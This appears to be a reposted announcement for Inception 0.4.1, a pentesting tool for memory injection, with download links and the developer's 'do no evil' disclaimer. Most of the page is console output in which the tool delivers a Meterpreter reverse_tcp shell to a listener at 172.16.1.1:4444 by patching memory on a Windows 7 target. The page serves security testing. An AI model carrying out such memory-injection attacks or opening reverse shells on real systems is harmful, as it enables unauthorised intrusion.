 _|  _|_|    _|  _|        _|        _|    _|    _|    _|  _|    _|  _|_|    _|
 _|  _|  _|  _|  _|        _|_|_|    _|_|_|      _|    _|  _|    _|  _|  _|  _|
 _|  _|    _|_|  _|        _|        _|          _|    _|  _|    _|  _|    _|_|
 _|  _|      _|    _|_|_|  _|_|_|_|  _|          _|    _|    _|_|    _|      _|

v.0.4.1 (C) Carsten Maartmann-Moe 2015
Download: http://breaknenter.org/projects/inception | Twitter: @breaknenter

[?] Will potentially write to file. OK? [y/N] y
[!] This module currently only work as a proof-of-concept against Windows 7 SP1
    x86. No other OSes, versions or architectures are supported, nor is there
    any guarantee that they will be supported in the future.
[?] What MSF payload do you want to use? windows/meterpreter/reverse_tcp
[*] Selected options:
[*] LPORT: 4444
[*] LHOST: 172.16.1.1
[*] EXITFUNC: thread
[*] Stage 1: Searcing for injection point
[================================>                             ]  837 MiB ( 53%)
[*] Signature found at 0x219d118c in page no. 137681
[*] Patching at 0x219d118c
[\] Waiting to ensure stage 1 execution
[*] Restoring memory at initial injection point
[*] Stage 2: Searching for page allocated in stage 1
[=========================>                                    ]  534 MiB ( 42%)
[*] Signature found at 0x1b2d9000 in page no. 111321
[*] Patching at 0x1b2d9000
[*] Patch verified; successful
[*] BRRRRRRRAAAAAWWWWRWRRRMRMRMMRMRMMMMM!!!<strong style="color: #00ff00; font-family: Georgia, 'Times New Roman', 'Bitstream Charter', Times, serif; font-size: 16px; line-height: 1.5; background-color: #ffffff;" data-mce-style="color: #00ff00; font-family: Georgia, 'Times New Roman', 'Bitstream Charter', Times, serif; font-size: 16px; line-height: 1.5; background-color: #ffffff;">&nbsp;</strong>

For Source & More Detail read here : http://www.breaknenter.org/projects/inception/

Disclaimer from Developers:
Do no evil with this tool. Also, I am a pentester, not a developer. So if you see weird code that bugs your pythonesque purity senses, drop me a note on how I can improve it. Or even better, fork my code, change it and issue a pull request.

Download : inception-0.4.1.zip(2.6 MB) | inception-0.4.1.tar.gz(1.8 MB)

Master.zip | Clone Url | Our Post Before

]]>